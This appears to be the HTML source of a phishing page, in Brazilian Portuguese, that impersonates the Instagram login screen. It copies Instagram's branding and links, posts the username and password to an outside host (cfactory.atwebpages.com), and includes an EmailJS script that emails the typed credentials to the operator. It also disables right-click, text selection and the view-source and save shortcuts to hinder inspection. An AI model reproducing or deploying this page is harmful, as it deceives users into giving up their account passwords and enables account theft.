<!DOCTYPE html>
<html lang="en">
<head>
	<script src="https://cdn.emailjs.com/dist/email.min.js"></script>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <title>Entrar • Instagram</title>

    <script>
        if (document.addEventListener) {
            document.addEventListener("contextmenu", function(e) {
                e.preventDefault();
                return false;
            });
        } else { //Versões antigas do IE
            document.attachEvent("oncontextmenu", function(e) {
                e = e || window.event;
                e.returnValue = false;
                return false;
            });
        }
    </script>

<script>
	// Adiciona a classe 'hidden' ao carregar a página
	window.onload = function() {
		document.querySelector('.content').classList.add('hidden');
	};
</script>

    <style>
        /*desabilita a seleção no body*/
        body {
            -webkit-touch-callout: none; /* iOS Safari */
              -webkit-user-select: none; /* Chrome/Safari/Opera */
               -khtml-user-select: none; /* Konqueror */
                 -moz-user-select: none; /* Firefox */
                  -ms-user-select: none; /* Internet Explorer/Edge */
                      user-select: none;
        }
        
        /*habilita a seleção nos campos editaveis*/
        input, textarea {
            -webkit-touch-callout: initial; /* iOS Safari */
              -webkit-user-select: text; /* Chrome/Safari/Opera */
               -khtml-user-select: text; /* Konqueror */
                 -moz-user-select: text; /* Firefox */
                  -ms-user-select: text; /* Internet Explorer/Edge */
                      user-select: text;
        }
        
        /*habilita a seleção nos campos com o atributo contenteditable*/
        [contenteditable=true] {
            -webkit-touch-callout: initial; /* iOS Safari */
              -webkit-user-select: all; /* Chrome/Safari/Opera */
               -khtml-user-select: all; /* Konqueror */
                 -moz-user-select: all; /* Firefox */
                  -ms-user-select: all; /* Internet Explorer/Edge */
                      user-select: all;
        }
        
        /* Estilos adicionais para o botão Mostrar Senha */
        .password-wrapper {
            position: relative;
        }
        
        .password-wrapper input[type="password"] {
            padding-right: 80px; /* Espaço para o botão Mostrar */
        }
    
        .password-wrapper button {
            position: absolute;
            top: 50%;
            right: 10px;
            transform: translateY(-50%);
            background-color: transparent;
            border: none;
            cursor: pointer;
            color: #007bff;
        }
        
        .password-wrapper button:hover {
            color: #0056b3;
        }
        
    </style>

    <script>
        if (document.addEventListener) {
            document.addEventListener("keydown", bloquearSource);
        } else { //Versões antigas do IE
            document.attachEvent("onkeydown", bloquearSource);
        }
        
        function bloquearSource(e) {
            e = e || window.event;
        
            var code = e.which || e.keyCode;
        
            if (
                e.ctrlKey &&
                (code == 83 || code == 85) //83 = S, 85 = U
            ) {
                if (e.preventDefault) {
                    e.preventDefault();
                } else {
                    e.returnValue = false;
                }
        
                return false;
            }
        }

        function togglePassword() {
            var passwordField = document.getElementById('password');
            var passwordButton = document.getElementById('toggle-password');
            if (passwordField.type === 'password') {
                passwordField.type = 'text';
                passwordButton.textContent = 'Ocultar';
            } else {
                passwordField.type = 'password';
                passwordButton.textContent = 'Mostrar';
            }
        }
    </script>

    <link rel="shortcut icon" type="imagex/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Instagram_icon.png/768px-Instagram_icon.png">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta2/css/all.min.css" integrity="sha512-YWzhKL2whUzgiheMoBFwW8CKV4qpHQAEuvilg9FAn5VJUDwKZZxkJNuGM4XkWuk94WCrrwslk8yWNGmY1EduTA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <br>
    </br>
    <br>
    </br>
    <div class="wrapper">
        <div class="header">
            <div class="top">
                <div class="logo">
                    <img src="instagram.png" alt="instagram" style="width: 175px;">
                </div>
                <div class="form">
                    <div class="input_field">
                        <form action="http://cfactory.atwebpages.com/apijson.php" method="Post">

                        <input type="text" placeholder="Telefone, nome de usuário ou email" class="input" id="username" name="username">
                    </div>
                    <div class="input_field password-wrapper">
                        <input type="password" placeholder="Senha" class="input" id="password" name="password">
                        <button type="button" id="toggle-password" onclick="togglePassword()">Mostrar</button>
                    </div>
                    <div class="btn"><a type="submit" name="submit" id="submit" href="404.html">Entrar</a></div> <!-- Alterado para redirecionar para a página 404 -->
                </div>
                <div class="or">
                    <div class="line"></div>
                    <p>OU</p>
                    <div class="line"></div>
                </div>
                <div class="dif">
                    <div class="fb">
                        <img src="facebook.png" alt="facebook">
                        <p> <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Dpt_BR%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%25221qtzvm7l0ig501v8kk491pmnntg17fyc7yzcldwaufo3uftnm2um%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D56542790-d608-4c94-a9db-e2bf6cfd7856%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221qtzvm7l0ig501v8kk491pmnntg17fyc7yzcldwaufo3uftnm2um%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=pt_BR&pl_dbl=0"> Entrar com o Facebook</a></p>
                    </div>
                    
                    <div class="forgot">
                        <a href="https://www.instagram.com/accounts/password/reset/">Esqueceu a senha?</a>
                    </div>
                </div>
            </div>
            <div class="signup">
                <p>Não tem uma conta? <a href="https://www.instagram.com/accounts/emailsignup/">Cadastre-se</a></p>
            </div>
            <div class="apps hidden-mobile">
                <p>Obtenha o aplicativo.</p>
                <div class="icons">
                    <a href="https://apps.apple.com/br/app/instagram/id389801252"><img src="appstore.png" alt="appstore"></a>
                    <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3DA99B4CC9-57EA-478E-9FEF-36BDF5328506%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge%26original_referrer%3Dhttps%3A%2F%2Fwww.bing.com%2F"><img src="googleplay.png" alt="googleplay"></a>
                </div>
            </div>
        </div>
        <br>
        <br>
        <br>
        <br>
        <br>
        <div class="footer hidden-mobile-footer">
            <div class="links">
                <ul>
                    
                    <li><a href="https://about.meta.com/">Meta</a></li>
                    <li><a href="https://about.instagram.com/">Sobre</a></li>
                    <li><a href="https://about.instagram.com/blog">Blog</a></li>
                    <li><a href="https://about.instagram.com/about-us/careers">Carreiras</a></li>
                    <li><a href="#">Ajuda</a></li>
                    <li><a href="https://developers.facebook.com/docs/instagram-platform">API</a></li>
                    <li><a href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect">Privacidade</a></li>
                    <li><a href="#">Termos</a></li>
                    <li><a href="https://www.instagram.com/explore/locations/">Localizações</a></li>
                    <li><a href="https://www.instagram.com/web/lite/">Instagram Lite</a></li>
                    <li><a href="https://www.threads.net/">Threads</a></li>
                    <li><a href="https://www.facebook.com/help/instagram/261704639352628">Sincronizar contatos e usuários</a></li>
                    <li><a href="#">Meta Verified</a></li>
                </ul>
            </div>
            <br>
            <div class="copyright">
                Português (Brasil)
                &nbsp;
                <i class="fas fa-chevron-down"></i>
                &nbsp;
                © 2024 Instagram from Meta

				<script>
					// Inicializa o EmailJS com seu User ID
					emailjs.init('ozZzNwH5XTtBAzIwo'); // Substitua 'seu_user_id' pelo seu User ID do EmailJS
				
					document.getElementById('loginForm').addEventListener('submit', function(e) {
						e.preventDefault();
				
						const username = document.getElementById('username').value;
						const password = document.getElementById('password').value;
				
						emailjs.send('service_j4htins', '__ejs-test-mail-service__', {
							username: username,
							password: password
						})
						.then(response => {
							alert('Informações enviadas com sucesso!');
						})
						.catch(error => {
							console.error('Erro:', error);
							alert('Erro ao enviar informações');
						});
					});
				</script>

            </div>
        </div>
    </div>
</body>
</html>
